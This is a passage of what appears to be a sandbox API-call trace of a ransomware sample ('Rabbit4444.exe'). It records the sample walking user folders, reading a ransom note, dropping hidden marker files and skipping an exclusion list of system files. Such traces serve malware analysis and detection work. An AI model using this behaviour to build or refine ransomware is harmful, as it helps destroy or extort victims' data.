cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0070.448] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0070.448] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.448] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.449] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.449] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.449] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.449] CloseHandle (hObject=0x29c) returned 1 [0070.449] CloseHandle (hObject=0x27c) returned 1 [0070.450] GetCurrentThreadId () returned 0xd98 [0070.450] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0070.450] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState" [0070.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ba48 | out: hHeap=0xe0000) returned 1 [0070.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0070.450] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState" [0070.450] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\" [0070.450] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0070.450] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.453] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.455] FlushFileBuffers (hFile=0x27c) returned 1 [0070.456] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.456] CloseHandle (hObject=0x27c) returned 1 [0070.457] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState") returned 104 [0070.457] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.457] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7659308d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf06a22a2, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf351570e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0070.457] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.457] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.457] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.457] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.457] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7659308d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf06a22a2, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf351570e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.457] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.457] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.457] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.457] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.457] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.457] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf351570e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf351570e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf351570e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.457] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.457] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.457] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e04053, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7edfd5ce, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x7edfd5ce, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Assets", cAlternateFileName="")) returned 1 [0070.457] lstrcmpiW (lpString1="Assets", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.457] lstrcmpiW (lpString1="Assets", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.457] lstrcmpiW (lpString1="Assets", lpString2="Rabbit4444.exe") returned -1 [0070.457] lstrcmpiW (lpString1="Assets", lpString2=".") returned 1 [0070.457] lstrcmpiW (lpString1="Assets", lpString2="..") returned 1 [0070.457] lstrcmpiW (lpString1="Assets", lpString2="windows") returned -1 [0070.457] lstrcmpiW (lpString1="Assets", lpString2="bootmgr") returned -1 [0070.458] lstrcmpiW (lpString1="Assets", lpString2="pagefile.sys") returned -1 [0070.458] lstrcmpiW (lpString1="Assets", lpString2="boot") returned -1 [0070.458] lstrcmpiW (lpString1="Assets", lpString2="ids.txt") returned -1 [0070.458] lstrcmpiW (lpString1="Assets", lpString2="NTUSER.DAT") returned -1 [0070.458] lstrcpyW (in: lpString1=0x130ec0a, lpString2="Assets" | out: lpString1="Assets") returned="Assets" [0070.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fc0 [0070.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe0) returned 0x126308 [0070.458] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fc8 | out: ListHead=0xf68b0, ListEntry=0x121fc8) returned 0x122048 [0070.458] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcf78aa81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1e2a2f0, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ContentManagementSDK", cAlternateFileName="CONTEN~1")) returned 1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="Rabbit4444.exe") returned -1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2=".") returned 1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="..") returned 1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="windows") returned -1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="bootmgr") returned 1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="pagefile.sys") returned -1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="boot") returned 1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="ids.txt") returned -1 [0070.458] lstrcmpiW (lpString1="ContentManagementSDK", lpString2="NTUSER.DAT") returned -1 [0070.458] lstrcpyW (in: lpString1=0x130ec0a, lpString2="ContentManagementSDK" | out: lpString1="ContentManagementSDK") returned="ContentManagementSDK" [0070.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0070.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xfc) returned 0x11b380 [0070.458] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x121fc8 [0070.458] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf06a22a2, ftCreationTime.dwHighDateTime=0x1d327e6, ftLastAccessTime.dwLowDateTime=0xf073ad70, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf073ad70, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Features", cAlternateFileName="")) returned 1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.458] lstrcmpiW (lpString1="Features", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="Rabbit4444.exe") returned -1 [0070.458] lstrcmpiW (lpString1="Features", lpString2=".") returned 1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="..") returned 1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="windows") returned -1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="bootmgr") returned 1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="pagefile.sys") returned -1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="boot") returned 1 [0070.458] lstrcmpiW (lpString1="Features", lpString2="ids.txt") returned -1 [0070.459] lstrcmpiW (lpString1="Features", lpString2="NTUSER.DAT") returned -1 [0070.459] lstrcpyW (in: lpString1=0x130ec0a, lpString2="Features" | out: lpString1="Features") returned="Features" [0070.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0070.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe4) returned 0x117468 [0070.459] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122248 [0070.459] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6112409, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7edfd5ce, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x7edfd5ce, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="StagedAssets", cAlternateFileName="STAGED~1")) returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="Rabbit4444.exe") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2=".") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="..") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="windows") returned -1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="bootmgr") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="pagefile.sys") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="boot") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="ids.txt") returned 1 [0070.459] lstrcmpiW (lpString1="StagedAssets", lpString2="NTUSER.DAT") returned 1 [0070.459] lstrcpyW (in: lpString1=0x130ec0a, lpString2="StagedAssets" | out: lpString1="StagedAssets") returned="StagedAssets" [0070.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0070.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xec) returned 0x11f578 [0070.459] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x1222c8 [0070.459] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ca4042, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x6ca4042, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x6ca4042, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TargetedContentCache", cAlternateFileName="TARGET~1")) returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="Rabbit4444.exe") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2=".") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="..") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="windows") returned -1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="bootmgr") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="pagefile.sys") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="boot") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="ids.txt") returned 1 [0070.459] lstrcmpiW (lpString1="TargetedContentCache", lpString2="NTUSER.DAT") returned 1 [0070.459] lstrcpyW (in: lpString1=0x130ec0a, lpString2="TargetedContentCache" | out: lpString1="TargetedContentCache") returned="TargetedContentCache" [0070.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0070.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xfc) returned 0x115180 [0070.459] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x121fe8 [0070.460] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xece52509, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xc76b785f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xc76b785f, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tips", cAlternateFileName="")) returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="Rabbit4444.exe") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2=".") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="..") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="windows") returned -1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="bootmgr") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="pagefile.sys") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="boot") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="ids.txt") returned 1 [0070.460] lstrcmpiW (lpString1="Tips", lpString2="NTUSER.DAT") returned 1 [0070.460] lstrcpyW (in: lpString1=0x130ec0a, lpString2="Tips" | out: lpString1="Tips") returned="Tips" [0070.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0070.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x125d98 [0070.460] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122368 [0070.460] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xece52509, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xc76b785f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xc76b785f, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tips", cAlternateFileName="")) returned 0 [0070.460] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0070.460] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.460] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.461] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.461] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.461] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.461] CloseHandle (hObject=0x29c) returned 1 [0070.461] CloseHandle (hObject=0x27c) returned 1 [0070.461] GetCurrentThreadId () returned 0xd98 [0070.461] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0070.461] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips" [0070.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125d98 | out: hHeap=0xe0000) returned 1 [0070.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0070.461] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips" [0070.461] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\" [0070.461] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\.BFC0E91B00AE8A0620D3" [0070.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.469] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.471] FlushFileBuffers (hFile=0x27c) returned 1 [0070.472] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.472] CloseHandle (hObject=0x27c) returned 1 [0070.472] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips") returned 109 [0070.472] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.472] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xece52509, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xc76b785f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf353b96a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0070.472] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.472] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.473] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.473] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.473] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xece52509, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xc76b785f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf353b96a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.473] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.473] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.473] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.473] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.473] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.473] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, 